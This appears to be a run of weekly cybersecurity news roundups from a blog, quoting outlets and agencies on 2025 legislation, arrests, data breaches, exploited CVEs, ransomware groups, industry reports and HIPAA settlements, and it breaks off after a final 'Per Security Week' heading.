From the cybersecurity policy and law enforcement front,

• Per a Senate news release,
  • “U.S. Senators Mike Rounds (R-S.D.), Chairman of the Senate Armed Services Committee’s Subcommittee on Cybersecurity, and Gary Peters (D-Mich.) introduced a bipartisan bill to extend the Cybersecurity Information Sharing Act (CISA) of 2015 for an additional ten years.
  • CISA, signed into law in 2015, incentivizes companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). This protects Americans’ personal information and makes certain that both the federal government and companies can take collaborative steps to prevent data breaches or attacks from cybercriminals and foreign adversaries.
  • “The Cybersecurity Information Sharing Act of 2015 has been instrumental in strengthening our nation’s cyber defenses by enabling critical information sharing between the private sector and government,” said Rounds. “Allowing this legislation to lapse would significantly weaken our cybersecurity ecosystem, removing vital liability protections and hampering defensive operations across both the defense industrial base and critical infrastructure sectors.”
  • “As cybersecurity threats grow increasingly sophisticated, information sharing is not just valuable—it remains essential for our national security,” said Peters. “For the past ten years, these critical protections have helped to address rapidly evolving cybersecurity threats, and this bipartisan bill will renew them so we can continue this collaborative partnership between the private sector and government to bolster our nation’s cybersecurity defenses against a wide range of adversaries.”
  • Click HERE to read full text of the bill.

• Cyberscoop reports,
  • “A bipartisan Senate bill would formally ban the use of DeepSeek by federal contractors, part of a larger effort to keep the Chinese-made large language model out of government systems and networks, where lawmakers fear it could pose cybersecurity and national security concerns.
  • “The bill, introduced by Sens. Bill Cassidy, R-La., and Jacky Rosen, D-Nev., would bar federal contractors from using the model to carry out any activity related to a federal contract. It also blocks contractors from using any successor model developed by High Flyer, the Chinese quantitative firm that made DeepSeek.
  • “Cassidy and Rosen cited the potential that the use of DeepSeek — which acknowledges that it sends user data back to China — to carry out contract work may put sensitive federal data in the hands of the Chinese government.
  • “AI is a powerful tool which can be used to enhance things like medicine and education,” Cassidy said in a statement. “But in the wrong hands, it can be weaponized. By feeding sensitive data into systems like DeepSeek, we give China another weapon.” 
• and
  • “Authorities in Poland have arrested four people accused of administrating and selling access to distributed denial of service (DDoS) services, according to a press release from Europol.  
  • “The suspects are believed to have operated six so-called “stresser” or “booter” services that enabled customers across the world to launch thousands of attacks on targets ranging from government offices to businesses and schools. From 2022 to 2025, the platforms — identified as Cfxapi, Cfxsecurity, neostress, jetstress, quickdown, and zapcut — allegedly allowed users to bombard websites and servers with high volumes of junk traffic, often rendering them inaccessible. 
  • “The services, which offered easy-to-navigate interfaces, required minimal user knowledge: attackers could select a target, choose the attack specifications, and pay as little as 10 euros for each disruption, according to Europol.
  • “The arrests in Poland were part of a coordinated law enforcement response spanning four countries and supported by Europol. In addition to the Central Cybercrime Bureau in Poland, the investigation was supported by German Federal Criminal Police Office, the Prosecutor General’s Office in Frankfurt, the Dutch National Police, and multiple U.S. agencies, including the Department of Justice, FBI, Homeland Security Investigations (HSI), and Defense Criminal Investigative Service (DCIS).” 

From the cybersecurity breaches and vulnerabilities front,

• Bleeping Computer tells us,
  • “Ascension, one of the largest private healthcare systems in the United States, has revealed that the personal and healthcare information of over 430,000 patients was exposed in a data breach disclosed last month.
  • “As Ascension revealed in breach notification letters sent to affected individuals in April, their information was stolen in a data theft attack that impacted a former business partner in December.
  • “Depending on the impacted patient, the attackers could access personal health information related to inpatient visits, including the physician’s name, admission and discharge dates, diagnosis and billing codes, medical record number, and insurance company name. They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs).” * * *
  • “Our investigation determined on January 21, 2025, that Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in third-party software used by the former business partner.” * * *
  • “Although Ascension didn’t share any details regarding the breach affecting its former business partner, the timeline of the breach implies that the attack was part of widespread Clop ransomware data theft attacks that exploited a zero-day flaw in Cleo secure file transfer software.
  • “Last year, Ascension notified almost 5.6 million patients and employees that their personal, financial, insurance, and health information had been stolen in a May 2024 Black Basta ransomware attack.”
• and
  • “Cisco has fixed a maximum severity flaw in IOS XE Software for Wireless LAN Controllers by a hard-coded JSON Web Token (JWT) that allows an unauthenticated remote attacker to take over devices.
  • “This token is meant to authenticate requests to a feature called ‘Out-of-Band AP Image Download.’ Since it’s hard-coded, anyone can impersonate an authorized user without credentials.
  • “The vulnerability is tracked as CVE-2025-20188 and has a maximum 10.0 CVSS score, allowing threat actors to fully compromise devices according to the vendor.”

• Cybersecurity Dive informs us,
  • “A second wave of cyberattacks is targeting a critical vulnerability in SAP NetWeaver Visual Composer, according to researchers.
  • “Following the initial round of threat activity disclosed in April, opportunistic threat actors are leveraging webshells that were previously established through exploitation of CVE-2025-31324. The vulnerability, with a CVSS score of 10, allows unauthenticated attackers to upload arbitrary files and take full control of a system, according to researchers at Onapsis.
  • “Onapsis and Mandiant are tracking hundreds of confirmed compromises worldwide, with the cases spanning across multiple industries, including utilities, manufacturing, oil and gas and other critical infrastructure sectors. 
  • “The Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its known exploited vulnerabilities catalog in late April.” 

• Cyberscoop adds,
  • “Vulnerabilities are proliferating in SonicWall devices and software this year, putting the vendor’s customers at risk of intrusion via secure access gateways and firewalls.
  • “The year started off on a sour note for the California-based company when it released security advisories for nine vulnerabilities on Jan. 7. The total number of vulnerabilities publicly disclosed by the company so far in 2025 has grown to 20. 
  • “SonicWall vulnerabilities are also making a consistent appearance on the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities (KEV) catalog. Cyber authorities confirm that attackers exploited four vulnerabilities in SonicWall products so far this year, and 14 total since late 2021.
  • “Eight of those vulnerabilities have been exploited in ransomware campaigns, according to CISA.”

• Bleeping Computer adds,
  • “SonicWall has urged its customers to patch three security vulnerabilities affecting its Secure Mobile Access (SMA) appliances, one of them tagged as exploited in attacks.
  • “Discovered and reported by Rapid7 cybersecurity researcher Ryan Emmons, the three security flaws (CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821) can be chained by attackers to gain remote code execution as root and compromise vulnerable instances.
  • “The vulnerabilities impact SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices and are patched in firmware version 10.2.1.15-81sv and higher.”

• CISA added four known exploited vulnerabilities to its catalog this week.
• May 5, 2025
  • CVE-2025-3248 Langflow Missing Authentication Vulnerability
  • Dark Reading discusses this KVE here.
• May 6, 2025
  • CVE-2025-27363 FreeType Out-of-Bounds Write Vulnerability
  • Hacker News discusses this KVE here.
• May 7, 2025
  • CVE-2024-6047 GeoVision Devices OS Command Injection Vulnerability
  • CVE-2024-11120 GeoVision Devices OS Command Injection Vulnerability
  • SC Media discusses these KVEs here.

From the ransomware front,

• Dark Reading reports,
  • “Email-based attacks continued to cost enterprises big bucks in 2024, according to new cyber-insurance claims data.
  • “Cyber-insurance carrier Coalition published its “2025 Cyber Claims Report” on May 7, showing that business email compromise (BEC) attacks and fund transfer fraud (FTF) accounted for 60% of all the company’s claims last year. BEC attacks were particularly problematic for customers, according to Coalition; claims severity for such threats increased 23%, with incident’s costing organizations, on average, $35,000.
  • “That dollar figure is a far cry from the average loss for ransomware attacks in 2024, which Coalition said was $292,000. However, the claims report, which features data from customers in the US, the UK, Canada, and Australia, offered some encouraging data points, including a 7% drop in ransomware claims severity and a 3% decline in claims frequency.
  • “Additionally, Coalition found that FTF claims severity fell dramatically by 46%, to an average loss of $185,000, while claims frequency dropped 2%. Overall, the cyber-insurance carrier said it observed “remarkable year-over-year (YoY) stability” for claims, despite an intensifying threat landscape where financially motivated attackers continue to develop novel techniques and exploit new vulnerabilities.”

• The Hacker News relates,
  • “Threat actors with ties to the Qilin ransomware family have leveraged malware known as SmokeLoader along with a previously undocumented .NET compiled loader codenamed NETXLOADER as part of a campaign observed in November 2024.
  • “NETXLOADER is a new .NET-based loader that plays a critical role in cyber attacks,” Trend Micro researchers Jacob Santos, Raymart Yambot, John Rainier Navato, Sarah Pearl Camiling, and Neljorn Nathaniel Aguas said in a Wednesday analysis.
  • “While hidden, it stealthily deploys additional malicious payloads, such as Agenda ransomware and SmokeLoader. Protected by .NET Reactor 6, NETXLOADER is difficult to analyze.”
  • “Qilin, also called Agenda, has been an active ransomware threat since it surfaced in the threat landscape in July 2022. Last year, cybersecurity company Halcyon discovered an improved version of the ransomware that it named Qilin.B.”

• Per Bleeping Computer,
  • “The Play ransomware gang has exploited a high-severity Windows Common Log File System flaw in zero-day attacks to gain SYSTEM privileges and deploy malware on compromised systems.
  • “The vulnerability, tracked as CVE-2025-29824, was tagged by Microsoft as exploited in a limited number of attacks and patched during last month’s Patch Tuesday.
  • “The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia,” Microsoft said in April.”

• The Wall Street Journal reports,
  • “The hacking group that once shut down half the Las Vegas Strip has returned and is causing turmoil at U.K. retailers.
  • “The hackers call themselves Star Fraud but are more widely known as Scattered Spider, a collective of largely young men and teenagers that have wreaked havoc across industries in recent years.
  • “U.K. retailers Harrods, Marks & Spencer MKS -1.05%decrease; red down pointing triangle and Co-op have all reported cyber intrusions in the past two weeks. Scattered Spider hasn’t been publicly named as the culprit of the hacks, but is suspected in at least some of them, according to people familiar with the investigation.
  • “The attacks bear all the hallmarks of Scattered Spider attacks, disrupting online sales and certain payments and leading to the theft of customer data. The stores have remained open.
  • “The group’s hackers “typically work their way through a sector, so other retailers should take the opportunity to harden their defenses,” said John Hultquist, chief analyst with Google’s Mandiant cybersecurity investigations group.” 

• Per Cyberscoop,
  • “Five months after education software vendor PowerSchool paid an unnamed threat actor a ransom in exchange for the deletion of sensitive stolen data, some of the company’s customers are now receiving extortion demands. 
  • “A threat actor, who may or not be the same criminal group behind the attack, has contacted four school district customers of PowerSchool in the past few days, CyberScoop has learned, threatening to leak data if they don’t pay. 
  • “The downstream extortion attacks highlight the ongoing risk organizations confront when a vendor is hit by a cyberattack, exposing not just their data but also that of others in their supply chain. The follow-on extortion attempts also underscore that paying ransoms for data does not guarantee stolen data won’t be leaked.”

• Dark Reading reports,
  • “The notorious ransomware gang LockBit appeared to suffer another setback this week after its network was compromised by an unknown adversary.
  • “On May 7, a range of security researchers observed that LockBit’s Dark Web leak site had been altered. Instead of listing victim organizations, the site now features a simple message: “Don’t do crime CRIME IS BAD xoxo from Prague,” along with a link to a zip archive.
  • “The archive, according to analysis from Qualys yesterday, among others, includes a SQL database file from LockBit’s affiliate panel. Coalition researchers, meanwhile, noted the file includes extensive internal data from the ransomware-as-a-service operation, including nearly 60,000 Bitcoin addresses and more than 4,000 chats with victim organizations from between Dec. 19, 2024, and April 29, 2025.
  • “The file also contains information on more than 70 LockBit administrators and affiliates, researchers noted, including plaintext passwords, as well individual builds and configurations of the LockBit ransomware code. However, the leaked data did not include decryptors or private keys.”

From the cybersecurity defenses front,

• CISA announced,
  • “The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Environmental Protection Agency (EPA), and Department of Energy (DOE)—hereafter referred to as “the authoring organizations”—are aware of cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States. The authoring organizations urge critical infrastructure entities to review and act now to improve their cybersecurity posture against cyber threat activities specifically and intentionally targeting internet connected OT and ICS.”
  • Mitigations and resources are included in the announcement.

• Bank Info Security lets us know that “Despite the rise of artificial intelligence and automation, human ingenuity remains a critical asset in defending against cyberthreats, said Kara Sprague, CEO at HackerOne.”
  
• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• Cyberscoop reports,
  • “The Cybersecurity and Infrastructure Security Agency will soon have a new second-in-command.
  • “Madhu Gottumukkala has been named deputy director. He comes over to CISA from his prior position in the South Dakota government, where Kristi Noem was most recently governor before taking over as secretary of the Department of Homeland Security. Gottumukkala had been commissioner of the Bureau of Information and Telecommunication (BIT) and state chief information officer.
  • “He’ll leave BIT on May 16. A CISA spokesperson confirmed that Gottumukkala would become deputy director of the agency.”

• CISA gives us the results of the President’s Cup competition and also announced on April 23,
  • “The [Critical Vulnerabilities and Exposures] CVE Program is an invaluable public resource relied upon by network defenders and software developers alike. As the nation’s cyber defense agency, it is a foundational priority for CISA. Recent public reporting inaccurately implied the program was at risk due to a lack of funding. To set the record straight, there was no funding issue, but rather a contract administration issue that was resolved prior to a contract lapse. There has been no interruption to the CVE program and CISA is fully committed to sustaining and improving this critical cyber infrastructure. 
  • CISA is proud to be the sponsor for the CVE program, a role we have held for decades. During this time, the CVE Program has gone through many evolutions, and this opportunity is no exception. MITRE, CISA, and the CVE Board have transformed this program into a federated capability with 453 CVE Numbering Authorities (CNAs). This growth has enabled faster and more distributed CVE identification, providing valuable vulnerability information to the public and enabling defenders to take quick action to protect themselves. We have historically been and remain very open to reevaluating the strategy to support the continued efficacy and value of the program.  
  • We also recognize that significant work lies ahead. CISA, in coordination with MITRE and the CVE Board, is committed to actively seeking and incorporating community feedback into our stewardship of the CVE Program. We are committed to fostering inclusivity, active participation, and meaningful collaboration between the private sector and international governments to deliver the requisite stability and innovation to the CVE Program. And we are committed to achieving these goals together.

• Bleeping Computer tells us,
  • “The FBI has asked the public for information on Chinese Salt Typhoon hackers behind widespread breaches of telecommunications providers in the United States and worldwide.
  • “In October, the FBI and CISA confirmed that the Chinese state hackers had breached multiple telecom providers (including AT&T, Verizon, Lumen, Charter Communications, Consolidated Communications, and Windstream) and many other telecom companies in dozens of countries.
  • “As revealed at the time, while they had access to the U.S. telecoms’ networks, the attackers also accessed the U.S. law enforcement’s wiretapping platform and gained access to the “private communications” of a “limited number” of U.S. government officials.”

• The HHS Office for Civil Rights announced,
  • “Today [April 25], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Comprehensive Neurology, PC (Comprehensive), a small New York neurology practice, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule. The settlement resolves an OCR investigation of a [2020] ransomware attack against Comprehensive.” * * *
  • “Under the terms of the settlement, Comprehensive agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $25,000 to OCR.”
  • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-racap-np.pdf, opens in a new tab [PDF, 245 KB]“
• and
  • “Today [April 23], the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with PIH Health, Inc. (PIH), a California health care network, over potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA). The violations stem from a phishing attack that exposed unsecured electronic protected health information (ePHI), prompting concerns related to the Privacy, Security, and Breach Notification Rules under HIPAA.” * * *
  • “The settlement resolves an investigation that OCR conducted after receiving a breach report from PIH in January 2020. The breach report stated that in June 2019, a phishing attack compromised forty-five of its employees’ email accounts, resulting in the breach of 189,763 individuals’ unsecured ePHI. PIH reported that the ePHI disclosed in the phishing attack included affected individuals’ names, addresses, dates of birth, driver’s license numbers, Social Security numbers, diagnoses, lab results, medications, treatment and claims information, and financial information.”
  • “Under the terms of the resolution agreement, PIH has agreed to implement a corrective action plan that will be monitored by OCR for two years and paid a $600,000 settlement to OCR.” * * *
  • The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance enforcement/agreements/index.html.

Three important reports were released this week.

• Per Cyberscoop,
  • “It looks like 2024 was a record year in cybercrime for all the wrong reasons, according to the FBI’s annual Internet Crime Complaint Center (IC3) report released Wednesday. 
  • “As cyber-enabled fraud and ransomware continue to harm individuals, businesses, and critical infrastructure, the report, now in its 25th year, provides crucial insight into evolving criminal tactics and their nationwide impact. The report is overflowing with key trends, case data, and other statistics from the FBI’s ongoing efforts to combat the cyberthreat landscape.”
• and
  • “Cybercriminals and state-sponsored threat groups exploited vulnerabilities and initiated ransomware attacks with vigor last year, escalating the scope of their impact by hitting more victims and outmaneuvering defenses with speed.
  • “The rate of ransomware detected in data breaches jumped 37%, occurring in 44% of the 12,195 data breaches reviewed in Verizon’s 2025 Data Breach Investigations Report released Wednesday. Researchers observed the presence of ransomware in 32% of data breaches in last year’s report. 
  • “Verizon’s research underscores the twists and turns of cybercriminal activity and its wide-reaching impact on organizations. “We see less payment activity,” Alex Pinto, associate director of threat intelligence at Verizon Business, told CyberScoop, “but we don’t see it slowing down.”

• Per Cybersecurity Dive,
  • “Threat actors motivated by financial gain continue to rise in prominence, representing 55% of all cyber actors during 2024, according to a report by Mandiant. The figures show a steady increase from 52% in 2023 and 48% in 2022. 
  • “Exploits remained the most common initial access vector for the fifth consecutive year, representing 33% of exploits overall, according to the Mandiant M-Trends 2025 report. However, stolen credentials become the second most common initial access point for the first time, indicating a rising trend. 
  • “Cyber threat groups are increasingly targeting unsecured data repositories as poor security hygiene continues to leave organizations at risk.”

From the cyber vulnerabilities and breaches front,

• Healthcare Dive reports,
  • “A data breach at Yale New Haven Health has exposed the information of about 5.6 million people, according to a report submitted to federal regulators earlier this month.
  • “The Connecticut-based health system detected unusual activity on its IT systems in early March, Yale New Haven said in a press release. An investigation later found an unauthorized third party had gained access to its network and stole copies of some patient data. 
  • “The incident is the largest healthcare breach reported to federal regulators so far in 2025, according to a portal managed by the HHS’ Office of Civil Rights.”
• and
  • “A data breach at Blue Shield of California exposed information from 4.7 million people, according to a notice filed with federal regulators earlier this month. 
  • “In February, the insurer learned that Google Analytics, a vendor Blue Shield employs to track use of its websites, was sharing member data with the advertising service Google Ads from April 2021 through January 2024, according to a breach notice. 
  • “Blue Shield can’t confirm whether any particular beneficiary’s information is affected due to “the complexity and scope of the disclosures,” so the insurer is notifying all members who could have accessed their information on affected websites during the nearly three-year period.” 

• Cybersecurity Dive tells us,
  • “Conduent Inc. warned in an April 14 regulatory filing with the Securities and Exchange Commission that a “significant” number of people had their personal data stolen in a January cyberattack that affected a limited number of the company’s clients.
  • “The company, a major government payments technology vendor for social services and transit systems, was targeted in a Jan. 13 attack that disrupted certain operations. 
  • “The company warned it has incurred and accrued a material amount of nonrecurring expenses related to the breach. A spokesperson for the company did not have specific numbers yet, but a breach notification has already been posted by the California Attorney General’s office.”
• andInfor
  • Threat groups from across the globe are increasingly weaponizing older vulnerabilities for exploitation, according to a report released Wednesday by GreyNoise Intelligence. 
  • More than half of these resurgent vulnerabilities affect edge technologies, the report shows. Nearly seven out of 10 of the most unpredictable vulnerabilities — known as Black Swan vulnerabilities — affect edge technologies.
  • Almost 40% of Black Swan vulnerabilities specifically affect VPNs and routers, according to the report.

• Per Cyberscoop,
  • “Attackers exploited nearly a third of vulnerabilities within a day of CVE disclosure in the first quarter of 2025, VulnCheck said in a report released Thursday. The company, which focuses on vulnerability threat intelligence, identified 159 actively exploited vulnerabilities from 50 sources during the quarter.
  • “The time from CVE disclosure to evidence of exploitation in the first quarter was marginally faster than what VulnCheck observed during 2024, Patrick Garrity, security researcher at the company, said in the report. “This demonstrates the need for defenders to move fast on emerging threats while continuing to burn down their vulnerability debt,” Garrity wrote. 
  • “VulnCheck’s research reinforces multiple recent reports that warned about increased exploits in 2024. Mandiant said exploits were the most common initial infection vectorlast year, representing 1 of every 3 attacks. Verizon reported a 34% increase in exploited vulnerabilities, and IBM X-Force said exploitation of public-facing applications accounted for 30% of incident response cases last year.”
• and
  • “Attackers are having a field day with software defects in security devices, according to a new report released Wednesday by Mandiant. 
  • “Exploits were the most common initial infection vector, representing 1 of every 3 attacks in 2024, and the four most frequently exploited vulnerabilities were all contained in edge devices, such as VPNs, firewalls and routers, Mandiant said in its M-Trends report released Wednesday.
  • “Exploitation of these vulnerabilities represented slightly less than half of all observed vulnerability exploitation,” said Kirstie Failey, principal threat analyst at Google Threat Intelligence Group, under which the Mandiant brand operates.
  • “Threat researchers and federal cyber authorities have been sounding the alarm about attacks targeting network edge devices for more than a year. Since 2024, security device exploits have resulted in attacks on government agencies and some of the most valuable publicly-traded companies in the world.”

• Per Cybersecurity Dive,
  • “Security researchers warn that hackers are actively exploiting a critical unrestricted-file-upload vulnerability in SAP NetWeaver Visual Composer. 
  • “The vulnerability, tracked as CVE-2025-31324, could allow an unauthenticated user to upload malicious executable binaries. The vulnerability has a severity score of 10.  
  • “Researchers from Reliaquest disclosed the vulnerability to SAP after an investigation uncovered attackers uploading JSP webshells into publicly accessible directories.” 

• FEHBlog note: CISA did not add a known exploited vulnerability to its catalog this week.

From the ransomware front,

• Palo Alto Networks issued a report on extortion and ransomware trends in the first quarter of 2025.

• Dark Reading reports,
  • “The ransomware-as-a-service model is perpetually troubling for dropping the barrier to entry for aspiring ransomware actors, and two threat actors are innovating in the space with additional affiliate models.
  • “Extended detection and response vendor Secureworks (owned by Sophos) published research today detailing expanded affiliate models belonging to ransomware-as-a-service (RaaS) gangs DragonForce and Anubis.
  • “As a model, ransomware-as-a-service (RaaS) has gained significant popularity in recent years. A threat actor typically sells or leases many of the tools a less experienced cybercriminal (or affiliate) would need to conduct a ransomware attack; the affiliate typically shares the proceeds from subsequent attacks with the operator.
  • “The RaaS model has significantly lowered the technical barriers for wannabe cybercriminals, and as such it has become a serious problem for organizations around the world.”
    
• Infosecurity Magazine notes,
  • “A new ransomware strain known as ELENOR-corp, identified as version 7.5 of the Mimic ransomware, has been used in a series of targeted attacks on the healthcare sector.
  • “The campaign displays a range of advanced capabilities, including data exfiltration, persistent access and anti-forensic strategies designed to cripple recovery efforts and maximize damage.”

From the cybersecurity defenses front,

• Dark Reading lets us know,
  • “How Organizations Can Leverage Cyber Insurance Effectively. By focusing on prevention, education, and risk transfer through insurance, organizations — especially SMEs — can protect themselves from the rapidly escalating threats of cyberattacks.“
• and
  • “Navigating Regulatory Shifts & AI Risks. By proactively embracing emerging trends around encryption, AI security, and platform consolidation, organizations can turn compliance burdens into competitive advantage.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity renewals, policy and law enforcement front,

• Federal News Network reported on Tuesday,
  • “The Cybersecurity and Infrastructure Security Agency [CISA] has inked a last-minute funding extension for a key cyber vulnerability management program.
  • CISA’s contract with MITRE to manage the Common Vulnerabilities and Exposures, or CVE, program was set to expire on Wednesday. But after an outcry from the cybersecurity community, CISA executed an 11-month option period for MITRE’s contract on Tuesday night.
  • “The CVE program is invaluable to the cyber community and a priority of CISA,” a CISA spokesperson said on Wednesday. “Last night, CISA executed the option period on the contract to ensure there will be no lapse in critical CVE services. We appreciate our partners’ and stakeholders’ patience.”
  • The CVE program is a public database of known security vulnerabilities in software and hardware. It’s relied on by organizations across the world to manage cyber vulnerabilities in products and services. CISA’s “Known Exploited Vulnerabilities” database, for instance, relies on CVEs to prioritize how quickly federal agencies must patch bugs on the list.

• Cybersecurity Dive adds,
  • “Two federal lawmakers today introduced a bipartisan bill that preserves key regulation that facilitates the sharing of cyber-threat data between private companies and the federal government. 
  • “The Cybersecurity Information Sharing Extension Act, introduced by U.S. Sens. Gary Peters (D-MI) and Mike Rounds (R-SD), would extend provisions of the Cybersecurity Information Sharing Act of 2015, which is due to expire in September. The law encourages businesses to share information about ongoing cybersecurity threats with the federal government and is one of few legislative actions that has actually had an impact on real-world cybersecurity, security experts said.
  • “Specifically, the Cybersecurity Information Sharing Act of 2015 gives incentives to companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). It does this by providing legal protections for companies that do so by providing federal antitrust exemptions and precluding them from being held accountable for state and federal disclosure laws.”

• CISA announced,
  • “Cyber threats across the globe have put into focus our country’s need for cyber talent. CISA leads and hosts the President’s Cup Cybersecurity Competition to identify, recognize, and reward the best cyber talent across the federal workforce. Participants are challenged to outthink and outwit their competitors in a series of tests designed to expand cyber skills that are based on real-world situations.  For President’s Cup 6, participants will compete in a maximum velocity metaverse full of mayhem and taking place in a world light years ahead of our own.  
  • “Want to see what it’s like to participate in the President’s Cup? Federal employees can visit the President’s Cup Practice Area to take on challenges from previous competitions and receive a certificate of completion. Anyone can visit the President’s Cup GitHub page to find descriptions, solution guides, virtual machine builds and other artifacts from challenges featured in previous President’s Cup competitions. ” 

• The National Institute of Standards and Technology (NIST) let us know,
  • “A draft update to the NIST Privacy Framework will enable organizations to use it seamlessly with the agency’s Cybersecurity Framework, which received its own update last year. 
  • “Targeted changes to content and structure respond to stakeholder needs and make the document easier to use.”
  • “NIST is accepting public comments on the draft via privacyframework@nist.gov until June 13, 2025. A template for submitting comments can be found at the NIST Privacy Framework website. Following the comment period, NIST will consider additional changes and release a final version later this calendar year.”
    
• The HHS Office for Civil Rights announced on April 17,
  • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Guam Memorial Hospital Authority (GMHA), a public hospital on the U.S. Territory, island of Guam, concerning a potential violation of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Security Rule, following the receipt of two complaints alleging that the electronic protected health information (ePHI) of GMHA patients was impermissibly disclosed.” * * *
  • “Ransomware and hacking are the primary cyber-threats to electronic protected health information within the health care industry. Failure to conduct a HIPAA risk analysis puts this information at risk and vulnerable to future ransomware attacks and other cyber-threats,” said OCR Acting Director Anthony Archeval.
  • “Under the terms of the resolution agreement, GMHA agreed to implement a corrective action plan that will be monitored by OCR for three years, and paid OCR $25,000.” * * *
  • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-recap-gmha.pdf, opens in a new tab [PDF, 228 KB]“

• Per Bleeping Computer,
  • “The FBI warns that scammers impersonating FBI Internet Crime Complaint Center (IC3) employees offer to “help” fraud victims recover money lost to other scammers.
  • “Over the last two years, between December 2023 and February 2025, the FBI said it has received over 100 reports of fraudsters using this tactic.
  • “Complainants report initial contact from the scammers can vary. Some individuals received an email or a phone call, while others were approached via social media or forums,” the law enforcement agency warned in a Friday public service announcement.”

From the cybersecurity vulnerabilities and breaches front,

• Cyberscoop reports,
  • “A House panel has concluded that the U.S. government should double down on export controls and other tools to slow down the progress of Chinese AI companies like DeepSeek, while also preparing for a future where those efforts fail.
  • “In a report released Wednesday, the House Select Committee on the Chinese Communist Party further fleshes out the financial and technological resources that went into building DeepSeek’s R1 reasoning model, as well as its potential risks to U.S. economic and national security.
  • “The authors conclude that the DeepSeek website and app “acts as a direct channel for foreign intelligence gathering on Americans’ private data.”

• Dark Reading adds,
  • “One of China’s major state-funded espionage groups has created or otherwise upgraded various malware programs, signaling a notable arsenal refresh that defenders need to be aware of.
  • “Mustang Panda (aka Bronze President, Stately Taurus, and TA416) is an advanced persistent threat (APT) believed to be sponsored by the People’s Republic of China (PRC). It has long been known for spying on targets of interest to the PRC, including: military and government organizations, nongovernmental organizations (NGOs), think tanks, minority groups, and corporations in major industries, primarily around East and Southeast Asia but also in the West.
  • “Recently, the group attacked an organization based in Myanmar. In the process, researchers from Zscaler uncovered four previously unknown attack tools the group is now using. They include two keyloggers, a tool for facilitating lateral movement, and a driver used to evade endpoint detection and response (EDR) software. Besides that, the group has also upgraded its signature backdoor, “Toneshell.”

• Per Cybersecurity Dive,
  • “Lemonade Inc. has begun sending notification letters to about 190,000 people after their driver’s license numbers were transmitted unencrypted, according to regulatory filings by the company. 
  • “The company said a technical issue in its online application process for car insurance led to the exposure of data in an application programming interface call to a third-party data provider, according to an April 9 filing with the Securities and Exchange Commission. 
  • “As part of the online application process, certain information is sent between a server and a user’s browser, according to the filing. This includes data used to generate an insurance quote.  
  • “Lemonade said it learned of the issue on March 14 and said the exposures likely lasted from April 2023 through March 2024, according to a notice filed with the California Attorney General’s office.”
• and
  • “Hertz Corp. confirmed a threat actor gained access to sensitive personal data in a breach linked to vulnerabilities in Cleo file-transfer software, according to a filing Friday with the Maine Attorney General’s office. 
  • “Hertz said it learned on Feb. 10 that an unauthorized third party obtained the data in connection with an attack spree that took place between October and December 2024. Hertz completed an analysis of the stolen data on April 2. 
  • “Importantly, to date, our investigation has found no evidence that Hertz’s own network was affected by this event,” a Hertz spokesperson said via email. 

• CISA added four known exploited vulnerabilities to its catalog this week.
• April 16, 2025
  • CVE-2021-20035 SonicWall SMA100 Appliances OS Command Injection Vulnerability
    • Cybersecurity Dive discusses this KVE here.
• April 17, 2025
  • CVE-2025-31200 Apple Multiple Products Memory Corruption Vulnerability
  • CVE-2025-31201 Apple Multiple Products Arbitrary Read and Write Vulnerability
  • CVE-2025-24054 Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability
    • Dark Reading discusses the Apple KVEs here.
    • Hacker News discusses the Microsoft KVE here.

• Cybersecurity Dive adds,
  • “Huntress on Monday published research that showed exploitation of CVE-2025-30406, a deserialization vulnerability in Gladinet’s CentreStack enterprise file-sharing platform for managed service providers (MSPs). The cybersecurity vendor said seven organizations were compromised via the zero-day flaw, which involves a hardcoded cryptographic key that can be used to gain remote code execution.
  • “Huntress warned that Gladinet’s Triofox product also relies on a hardcoded key and is vulnerable to CVE-2025-30406. Triofox is an on-premises file-sharing server designed for larger enterprises, according to Gladinet.
  • “CISA added CVE-2025-30406 to its known exploited vulnerabilities catalog on April 9. Gladinet first disclosed the flaw on April 3 and warned that exploitation had already been observed in the wild.”

From the ransomware front,

• Cybersecurity Dive reports,
  • “DaVita has been hit by a ransomware attack that’s affecting operations, the kidney care provider said Monday. 
  • “The dialysis company discovered the attack, which encrypted parts of its network, on Saturday, according to a securities filing. Davita then activated its response plans and isolated affected systems.
  • “The company did not disclose how its operations are being affected or how long the disruption will last, but said patient care is continuing.” 
• and
  • “Ahold Delhaize confirmed Thursday that certain files from its U.S. operations were stolen in a November cyberattack after a threat group claimed credit for the incident.
  • “The threat group, tracked as Inc Ransom, claimed in a Wednesday post on its leak site to have up to 6 TB of sensitive data from the Netherlands-based supermarket operator’s U.S. division and threatened to release the information if its demands are not met, according to researchers at Arctic Wolf. The attackers have not said what those demands are.
  • “Since the incident was detected, our teams have been working diligently to determine what information may have been affected,” Ahold Delhaize USA said in a statement.”

• Per Security Week,
